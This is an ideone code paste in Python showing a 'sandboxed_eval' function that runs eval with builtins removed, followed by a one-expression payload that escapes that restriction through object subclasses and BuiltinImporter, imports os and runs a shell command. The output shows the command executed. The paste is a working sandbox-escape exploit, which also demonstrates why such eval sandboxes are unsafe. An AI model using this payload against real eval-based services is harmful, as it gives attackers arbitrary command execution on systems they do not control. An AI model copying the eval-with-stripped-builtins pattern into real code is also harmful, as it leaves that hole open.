fork download
copy 
  1. def sandboxed_eval(equation):
  2.     # Evaluate the equation with restricted globals and locals
  3.     result = eval(equation, {"__builtins__": None}, {})
  4.     return result
  5.  
  6. sneaky = (
  7.     "( ( ().__class__.__base__.__subclasses__()"
  8.     "[ [c.__name__ for c in (().__class__.__base__.__subclasses__())].index('BuiltinImporter') ]"
  9.     ".find_spec('builtins').loader.load_module('builtins')"
  10.     ".__import__('os').system('id'), 123 )[1] )"  # Returns 123 after executing 'id'
  11. )
  12.  
  13. print("result = ", sandboxed_eval(sneaky))
Success #stdin #stdout 0.11s 14084KB
comments (?)
stdin
copy 
Standard input is empty
stdout
copy 
uid=20087 gid=1000 groups=1000
result =  123
https://ideone.com/qzNtyu
language:
Python 3 (python  3.12)
created:
229 days ago
visibility:
secret

Share or Embed source code

Discover > Sphere Engine API

The brand new service which powers Ideone!

Discover > IDE Widget

Widget for compiling and running the source code in a web browser!